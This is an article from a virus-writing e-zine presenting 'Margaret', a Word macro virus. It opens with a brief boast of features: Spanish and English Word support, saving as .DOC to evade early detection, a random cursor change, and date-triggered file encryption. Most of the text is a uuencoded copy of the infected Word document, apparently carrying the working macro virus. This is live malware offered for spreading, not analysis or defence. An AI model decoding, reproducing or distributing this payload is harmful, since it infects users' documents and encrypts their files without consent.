 
  HEX-FILES No. 4                                                   File 013
 ออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออ 
                                  Margaret
 
                             A Word Macro Virus
 
                                     by
 
                                    Lorz
 
                            lorz@hackerz.zzn.com
                      http://members.tripod.com/~Lorz/
 
 
 
 
    Get to know Margaret:
    
       It is multi-language. It could infect documents created by the 
       Spanish versions of MS-Word 8, in addition to the English version. 
 
       Documents are saved saved with the DOC extension and not DOT. This 
       minimizes the possibility of early detection. 
 
       It has a nice payload. There are actually two payloads. First, it 
       changes the cursor at random. And, it encrypts the file on a 
       certain date.
 
  
 
 ฤฤ MARGARET.UUE STARTS HERE ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ 

begin 644 margaret.doc
MT,\1X*&Q&N$`````````````````````/@`#`/[_"0`&```````````````!
M````(0``````````$```(P````$```#^____`````"````#_____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________LI<$`1P`)!````!*_````````$```````!```
M(`0```X`8FIB:H[9CMD````````````````````````)!!8`'@P``.RS`0#L
MLP$`(`````````````````````````````````````````#__P\`````````
M``#__P\```````````#__P\``````````````````````%T``````)(`````
M````D@```)(`````````D@````````"2`````````)(`````````D@```!0`
M`````````````,(`````````P@````````#"`````````,(`````````P@``
M``P```#.````#````,(`````````G`,``+8```#F`````````.8`````````
MY@````````#F`````````.8`````````Y@````````#F`````````.8`````
M````/@$``"4"``!C`P```````&,#````````8P,```````!C`P```````&,#
M````````8P,``"0```!2!```]`$``$8&``!Z````AP,``!4`````````````
M````````````D@````````#F``````````````````````````````#F````
M`````.8`````````Y@````````#F`````````(<#````````^@````````"2
M`````````)(`````````Y@```````````````````.8`````````Y@``````
M``#Z`````````/H`````````^@````````#F````"@```)(`````````Y@``
M``````"2`````````.8`````````/@$`````````````````````````````
MI@````X```"T````#@```)(`````````D@````````"2`````````)(`````
M````Y@`````````^`0```````/H```!$````^@```````````````````#X!
M````````D@````````"2````````````````````````````````````````
M````````````````````````````````````````````/@$```````#F````
M`````-H````,````H*@@JB[9N@'"`````````,(`````````\`````H````^
M`0``````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````5&AI<R!T:&4-34%21T%2150-34%#4D\-5DE255,-#0T`````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````!```(`0``/T`````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````1#2I```0`$```)
M!```$@0``!@$```>!```'P0``"`$``#]````````````````_0``````````
M`````/T```````````````#]````````````````_0```````````````/T`
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````$````&``0```D$```2!```&`0``!X$```?!```(`0`````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````8<`!^PT"\@L.`](;`(!R*P
M"`<CD*`%))"@!26P````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````$@`/``H``0!;``\``@`````````D``!`\?\"
M`"0````&`$X`;P!R`&T`80!L`````@````0`;4@)!```````````````````
M`````#P`04#R_Z$`/````!8`1`!E`&8`80!U`&P`=``@`%``80!R`&$`9P!R
M`&$`<`!H`"``1@!O`&X`=```````````````````````(`````0```P```,`
M_____P$````$(/__`0```````````"``````````````!```(`0```,`````
M!```(`0```0`````!```(`0```4`````````(@````<``````"(````'`/__
M`@```!``(``@`"``(``@`"``(``@`"``(``@`"``(``@`"``(``-`$$`.@!<
M`&T`80!C`'(`;P`R`"X`9`!O`&,`_P$$````5@`"````__\`````````````
M````````5@`$``$`__\`````````````````````5@`%``(`__\`````````
M````````````5@`&``,`__\`````````````````````$/__!``"`!H`4`!R
M`&\`:@!E`&,`=``N`$T`;P!D`'4`;`!E`#$`+@!&`&D`;`!E`%,`80!V`&4`
M00!S``$`&`!0`'(`;P!J`&4`8P!T`"X`30!O`&0`=0!L`&4`,0`N`$$`=0!T
M`&\`3P!P`&4`;@`!`!<`4`!R`&\`:@!E`&,`=``N`$T`;P!D`'4`;`!E`#$`
M+@!0`&$`>0!L`&\`80!D``$`&@!0`'(`;P!J`&4`8P!T`"X`30!O`&0`=0!L
M`&4`,0`N`%0`;P!O`&P`<P!-`&$`8P!R`&\``0`1!``%`!<`4`!2`$\`2@!%
M`$,`5``N`$T`3P!$`%4`3`!%`#$`+@!0`$$`60!,`$\`00!$````!``8`%``
M4@!/`$H`10!#`%0`+@!-`$\`1`!5`$P`10`Q`"X`00!5`%0`3P!/`%``10!.
M`````@`:`%``4@!/`$H`10!#`%0`+@!-`$\`1`!5`$P`10`Q`"X`1@!)`$P`
M10!3`$$`5@!%`$$`4P````8`&@!0`%(`3P!*`$4`0P!4`"X`30!/`$0`50!,
M`$4`,0`N`%0`3P!/`$P`4P!-`$$`0P!2`$\```!``X`!``@````(````0)MU
M`!@!&`$(``````````@``````````A``````````(````$````@`0````P``
M`$<6D`$```("!@,%!`4"`P0#`````````````````````0````````!4`&D`
M;0!E`',`(`!.`&4`=P`@`%(`;P!M`&$`;@```#46D`$"``4%`0(!!P8"!0<`
M````````$```````````````@`````!3`'D`;0!B`&\`;````#,FD`$```(+
M!@0"`@("`@0#`````````````````````0````````!!`'(`:0!A`&P````B
M``0`\0B(&```T`(``&@!`````-X5`487&`%F``````0`)```````````````
M`0`!````!``#$`$```````````````$``0````$`````````T0(`````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````I0;`![0`
MM`"``'(P```1`!D`9````!D`````````````````````````````````````
M``````````````````````````````````````````````````````````(`
M``"?`?__$@`````````(`%0`:`!I`',`(`!T`&@`90`````````0`"``(``@
M`"``(``@`"``(``@`"X`(``@`"``(``@`"``$``@`"``(``@`"``(``@`"``
M(``N`"``(``@`"``(``@````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````/[_```$``(```````````````````````$`
M``#@A9_R^4]H$*N1"``K)[/9,````'`!```0`````0```(@````"````D```
M``,```"D````!````+`````%````S`````<```#8````"````.@````)````
M!`$``!(````0`0``"@```"P!```,````.`$```T```!$`0``#@```%`!```/
M````6`$``!````!@`0``$P```&@!```"````Y`0``!X````)````5&AI<R!T
M:&4``"``'@````$`````:&ES'@```!$````@("`@("`@("`@("`@("`@``!D
M`!X````!`````&]M:1X````'````3F]R;6%L`"`>````$0```"`@("`@("`@
M("`@("`@("```&0`'@````(````T`&UI'@```!,```!-:6-R;W-O9G0@5V]R
M9"`X+C```$``````V'4'!0```$``````C+8M)]FZ`4``````"B25+MFZ`0,`
M```!`````P`````````#``````````,`````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````#^_P``!``"```````````````````````"
M`````M7-U9PN&Q"3EP@`*RSYKD0````%U<W5G"X;$).7"``K+/FN3`$```@!
M```,`````0```&@````/````<`````4```"4````!@```)P````1````I```
M`!<```"L````"P```+0````0````O````!,```#$````%@```,P````-````
MU`````P```#I`````@```.0$```>````&0```%(@("`@("`@("`@("`@("`@
M("`@("`@(```0P`#`````0````,````!`````P`````````#````LPT(``L`
M````````"P`````````+``````````L`````````'A````$````)````5&AI
M<R!T:&4`#!````(````>````!@```%1I=&QE``,````!`````)@````#````
M`````"`````!````-@````(````^`````0````(````*````7U!)1%]'54E$
M``(```#D!```00```$X```![`#D`.0`Q`$8`0@`Q`$4`.0`M`#0`-0`U`$0`
M+0`Q`#$`0P!&`"T`.0!#`#4`-P`M`#``,``P`#``,``Q`#,`-0`Q`#D`-0`W
M`'T`````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````0````(````#````!`````4````&````
M!P```/[___\)````"@````L````,````#0````X````/````_O___Q$````2
M````$P```!0````5````%@```!<```#^____&0```!H````;````'````!T`
M```>````'P```/[____]____(@```"<```#^____)0```"8````K````+```
M`"D````J````_O___ST```!*````_O___R\````P````,0```#(````S````
M-````#4````V````-P```#@````Y````.@```#L````\````*````#X````_
M````0````$$```!+````0P```$0```!%````1@```$<```!(````20```"T`
M``#^____3````/[_____________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M__________________________________________________]2`&\`;P!T
M`"``10!N`'0`<@!Y````2P`>`@#P_O________]8'DD`@``````4```,<4@`
M<.A)`)@52P#_____%@`%`?__________`P````8)`@``````P````````$8`
M````H+T&TRW9N@%@(K&M+MFZ`20```!`%```!`8``#$`5`!A`&(`;`!E````
M87(C7P``!`8``%\C5V%T8VA-;V1U;&4C7S``````!`(````````&!0``[P0"
M```````.``(`________________4D]'4D%-($9)3$537$-/34U/3B!&24Q%
M4UQ-24-23U-/1E0@"``````0``!"05Q65P!O`'(`9`!$`&\`8P!U`&T`90!N
M`'0```!+```````#````"0```/P12P!`$DL`C!-+````````````<.A)`!H`
M`@$%````__________\```!&!`\``$,Z7%!R;V=R86T@1FEL97-<36EC<F]S
M;V9T($\``````!```&9I8V4%`%,`=0!M`&T`80!R`'D`20!N`&8`;P!R`&T`
M80!T`&D`;P!N````"`````D$``"($DL`Q!)+`)032P``````*``"`0(````$
M````_____P``````````_A4``````````````@```-"]20"@@!IEY3,891``
M````$```+`]+``4`1`!O`&,`=0!M`&4`;@!T`%,`=0!M`&T`80!R`'D`20!N
M`&8`;P!R`&T`80!T`&D`;P!N````0/Q*`&@D2P`X``(!________________
M``````````#\`@```````/P"````````_`,`````````````&``````0````
M````30!A`&,`<@!O`',`````````````````!0```-"]20!1L!-E*+`39:FI
M$V4[L!-E`````$````````````````X``0$!````$P```!(`````````````
M`````````````````$"`$J`NV;H!H*@@JB[9N@$```````````````!6`$(`
M00``````````````!P```-"]20`"YQ-E%.<39=33&66ETQEE`````$``````
M````````````````````"``!`/__________"0``````````````````````
M````````0(`2H"[9N@'@\@JI+MFZ`0```````````````%0`:`!I`',`1`!O
M`&,`=0!M`&4`;@!T````&65?V!EE.0@D94``````````````````````````
M```````````:``(!_____PT```#_____)/449?Q4&67$WQEE80@D94``````
M`````````````````````````&`$`````````0````(````#````!`````4`
M```&````!P````@````)````"@````L````,````#0````X````/````$```
M`!$```#^____$P```!0```#^_____O___Q<````8````&0```!H````;````
M_O___QT````>````'P```/[___\A````(@```",````D````)0```"8````G
M````*````"D````J````_O___RP````M````+@```"\````P````,0```#(`
M```S````-````#4````V````-P```#@````Y````.@```#L````\````/0``
M`#X````_````0````$$```!"````0P```$0```#^____1@```/[___](````
M_O___TH```!+````3````$T```!.````_O___U````#^________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M__________________________________________________________\!
M%@$`!K8`__\!`0````#_____`````/__/`#__P``Z+$?F5U%SQ&<5P```349
M5V<U&%$%1,\1G%<```$U&5<``````````````````````0#GL1^9747/$9Q7
M```!-1E7$`````,````%````!P```/__________`0$(````_____W@```#Z
M````8@,``!`"``#_____``````$```#I2>M)``#__Z,```"(````".>Q'YE=
M1<\1G%<```$U&5?HL1^9747/$9Q7```!-1E7__\``'X#``#R````\@```-(#
M``````$```#_____-````/____\`````WP#__P````#_________________
M____________________________________________________________
M____________________________________________________________
M____________________________________*`````(`4R+_____```!`%,0
M_____P```0!3(O____\`````-B+_____``#__P$!``````$`*``Q`$X`;P!R
M`&T`80!L`"X`5`!H`&D`<P!$`&\`8P!U`&T`90!N`'0`.%GI,`H``2(`*@!<
M`%(`9@!F`&8`9@`J`#<`,P`P`&4`.0`U`#``8P`Q`-\)````_____P$!T```
M``*!_O___________R@``````/__``````````#__________P`````=````
M)````/____](`````H/^______\(`/__8```````________`````/______
M____`````!T`#``D````@J`0`O_____^____D`````(`___^____`````/__
M________```3,QT`#``D`````H/^______\(`/__P```````________````
M`/__________```S`!T`#``D````_____S`````````````!`````````/__
M_____________P````#_____________________`````/__________:```
M`)@``````````````$``!```````A`.$`___________________________
M__\(``$`,````$U%``#_______\`````__\`````__\!`0``````````````
M````````````````````````````````````````````````````````````
M``````````#^R@$```#_____`0$(````_____W@````!BK``071T<FEB=70`
M92!60E].86T`92`](")4:&D`<T1O8W5M96X0="(-"@J,0F%S`0*,,4YO<FUA
M;`(N&59#<F5A=&$$8FP!8$9A;'-E`0R64')E9&5C;!)A``9)9`!X5')U@0TB
M17AP;W-E%!P`5&5M<&QA=&4@1&5R:785)$-UP'-T;VUI>@2'`V,`````````
M``````````````````````````````````!R58``````````@````(``````
M````&P````D`````````"0```````P`H`````````````````````0`!``$`
M"0<````````Q!P```````%D'````````"0````$`!`#A!@````````@``P`T
M````@0<```````!A```````!`*D'````````________________``#_____
M________________``#:`&,``'\```````````````````````!R58``````
M````@````(``````````#@````D```````(`__________\`````0`````0`
M`````'```'\`````<E6`````@````(````"``````0``?GT``'\`````#@``
M``D`````````"0``````!``(```````%``0`!``!````@0@````````P````
M#````/S&``!DG```.```````````````#`````@```````````````P`````
M``````!?`%\`4P!2`%``7P`R````````````````````````````````````
M````````````````````````````````$``"`/_______________P``````
M`````````````````````````````````````````!(```"R`````````%\`
M7P!3`%(`4`!?`#,`````````````````````````````````````````````
M```````````````````````0``(!"@````L```#_____````````````````
M````````````````````````````````%0```$``````````30!O`&0`=0!L
M`&4`,0``````````````````````````````````````````````````````
M`````````````!```@$.````$````/____\`````````````````````````
M```````````````````````N````\2(```````!?`%\`4P!2`%``7P`U````
M````````````````````````````````````````````````````````````
M````$``"`0P````'````_____P``````````````````````````````````
M`````````````!8```!*`0```````&G@9VEN86P"18`'`14'P0*$#L%'3F5W
M("[IP1!L88",/<)W@@L'$0$*AT-L;W-E1&]V8X004H`@`H!!$<`<3_?)($0-
M#($@1I4`F,`H1`D!7:4@($EN9F5C7G1#BX$;0[/`!6:)13X^/<2&@(5(HHQ.
MR%$K("D#7"`@B%P@!!%,::1S=$@7#0I%1#J$+?-!5<($(#)"!,80`IN!*?`D
M*#(I0$:"KP*$P`E="`<S!@>"$0#M($@'-9=&!X'P#`<V"@=!<\$#@X`+01)-
M96YU)*`.`>$`5&5X="0H,'@L(#$A)@$$8']C#'40;6)E<L`$0V]UI&YT0@)S
M*.%O;\!X@%-T97`@+3$`A@%?`"`@)R!.;R``<&]S:71I;VZ`(&)Y(&YO=T`-
M\T$'@2!/9J(+0A(A>@,C'6("3H(0I!/A!5-E;"'A/$-A<V5#(41E\'-C)"C)
M"$4_P05_`%\D!,01X@JJ,>,#4(47/;E$.2`@1P5F,VX%,\X*NR4U3@4U4@7C
M-HX%-H(%Y\%)XR'!`0T*P*WF%*I;8$QO8V%L9RS`/TDH=&5M`P(H)D(L()_`
M0`4(ARC"!(*L1B1BJ:8BH`#I+2P@Z`LLH$*_@A-C%K\`+@2B!R9E3N!3G`T*
MZM"@:R(?=6)CV`?EI<&4"X5!8F]R=+VC$6G$&$!93%J`'C"D'9D`U2!IP`/`
MU&\@*`:/0PC`*X((81\D*&G")0]@U&#J!;UHTV));G-`=&%L;&5DX`DM_X2(
MIAJ`'K<)`3+!1&`_"0H`5&]O375C:%3@<F]U8FQ!^:T*026$(&G"0$YO="`H
M$!Y!X&(B`3P$2B(@:5?(5S9)8@MN8_$%P'P&*$!=$%YU;65N=,!687(D*"(Q
M`J)6$&]R(BE'(B!S3?YE\3NQ"_,1N`%2$]$!0@(_X7B<<>`0,@)2)M,"+"``
M(D=L;V)A;#K_M0)`0',8T`*C/RH%6!-L`O]?!5`%Z`*/!8H%,!/5@8\%'GF4
M".<*Z`**!5-E=#!0<F]F\990F6YGYB"B%`"`4W1P%;L74&??X!/5(E(L32]0
M$6QPAS\O`%!A<W,-"E)E$'!E871``TUS9P!";W@@(DQO<@!Z('=A;G1S(`!M
M;W)E(&]F(#AY;W5`87*>XP(-"@0-"N(+0W5S=&\`;6EZ94ME>6)`;V%R9"`N
MD`!#!&]D82$R-RP@+L)#(()G;W)YP3+@`*,A'Z``(D-AH"-L0`V`+E)E;6]V
M99$"V&]N=#`\T`$PX!,0.T.P/,`$<R`B7H%$(LHE4@`MD`@-"K$+,`L#`![0
M,2A396-O;H!D*$YO=R@IP6P^,=!P&RN``G&,80-W;P-0"N&M87)G87)E_G3P
M!/$3,*Y#0F<9(1-LKH$2KU)O=71I;K&4&$]L9#(L,`M.;VW`1FEC:&EE,!H1
M+05P"6TA:G,N8D1EN&)U9P@ZE19@/W)@@?<WI5,CB+-/@`8D);,!7P7=4+(@
M!06QNI`.(`^640$[OP.Y`S)P$%$">U%3:^QI<%4).K@@J`F#N:$"\R,9/Q-O
M<C<30`;U*J``.<4%<V&@2O%90CUS($\A(.8!A!2@3E1OLSX@'BBE%[$6@`(D
M`F]B:IE`?VEV8P42*T1OHAK_P@3I&[\*8,S'`M\2T!)C!?GE%F5RX<]1*9(Y
MP`4BQ``@;V-C=7)R97YD%!75#K$%0`?A`,(F````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````,`````P```#\Q@``````
M`/@```````````````P````(```````````````,```````````````P````
M#````/S&````````H`$`````````````#`````@```````````````P`````
M`````````#`````,````_,8````````@`@`````````````,````"```````
M````````#```````````````!```$0``!```$0$`!```$0(`!```$0,`7```
M?P``````````````````````````````````````````````````````````
M``````````````````!R58``````````@````(``````````#@````D`````
M``4`__________\`````"`````0`)`"!```````%`````&```/W_________
M_____P```````````"0`J0``````!0`!``!@``#]______________\`````
M```````D`-$```````4``@``8```_?______________````````````)`#Y
M```````%``,``&```/W______________P````````````````!P``!_````
M````````````````````````````````````````````````````````````
M7P!?`%,`4@!0`%\`-```````````````````````````````````````````
M`````````````````````````!```@'_______________\`````````````
M```````````````````````````````````<````U`````````!?`%8`0@!!
M`%\`4`!2`$\`2@!%`$,`5```````````````````````````````````````
M````````````````&@`"`/_______________P``````````````````````
M`````````````````````````$(````?$0```````&0`:0!R````````````
M````````````````````````````````````````````````````````````
M```````(``(!________________````````````````````````````````
M````````````````(````*X"````````7P!?`%,`4@!0`%\`,```````````
M`````````````````````````````````````````````````````````!``
M`@#_______________\`````````````````````````````````````````
M```````K````;@8`````````1FEL95-A=F4,H1``#X```/\#!`!?0E]V87)?
M1FEL95-A=F44:1``"H```/\#!`!?0E]V87)?9&QG/D$0`!.```#_`P0`7T)?
M=F%R7T=E=$-U<E9A;'5E<YQ&$``1@```_P,$`%]"7W-T<E]7:6YD;W=.86UE
MW,<0``+__P$!;````!T"`0`,`/_______________________P`"`0#__P("
M``#__________________________________PP"`@#__PX"`P#__Q$"```,
M`/_______Q0"!`#__Q8"!0#__Q@"_____________P``$@````$`)```````
M````````````````````````````````$$```@``(``!````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````$6`0`$M@#__P$!
M`````/____\`````__\$`/__````````````````````````````````````
M`````````````````````````````````!`````#````!0````<```#_____
M_____P$!"````/____]X````W@```!`%``#.`0``_____P0````!````Z4GM
M20``__\#``````````(`````````````````````````````````````````
M`/__```L!0``U@```-8```#4'`````#_____`````-\`__\```````#_____
M_____________________________________________P0`__\,`/______
M____________________________________________________________
M_____________________________________________R@```````(\____
M_P```0``//__G`(`````-@K_____```!```\__^J`@``__\!`0```````#A9
MZ3`*``$D`"H`7`!2`&8`9@!F`&8`*@`Q`#0`,P`P`&4`.0`U`&$`8P!B````
MWP$```#_____`0'``@``'0`$`"0````"@QP"_____P@`__\P``````#_____
M__\`````__________\`````'0```"0````+$AX"^````````&``````____
M______\`````_____WS_2@#_____________```\`#P```"$```!````````
M((0B`O__________D`````````#_____'0`,`"0````"@QP"_____P@`___`
M``````#_______\`````__________\0````'0`$`"0````"@QP"_____P@`
M___P``````#_______\`````________________'0`$`"0````+$CX"H`$`
M``$``&``````__________\`````_____P``"@#_____________`0`8`!@`
M.`"$```!``#_____'0`$`"0````=``0`)`````*#'`+_____"`#__P``````
M`/_______P````#__________Y`"```"@QP"_____P@`__^8`0````#_____
M__\`````________________'0`$`"0````+$G`"(`(```(``&``````____
M______\`````_____WS_"@#_____________`@`.``X`4`"$```!``#_____
M((0B`O__________0`$```````#_____`H,<`O____\(`/__.`$`````____
M____`````/_______________PL2D`+_____`P``8`````#__________P``
M``#_____```*`/____________\#`!T`'0!>`(0```$``/__________F`$`
M`/@```#__________S@````@`@``_____Z`!``!A`&(``H,<`O____\(`/__
ML`(`````________`````/__________`````!T`"``D````_____Q`"```$
M``0``````````````#@```#_____________________(`(``/__________
M_____________________X@"``````````````@`!`#_____`````/______
M_________________________P<`:`(``$U%``#_______\`````__\`````
M__\!`0``````````````````````````````````````````````````````
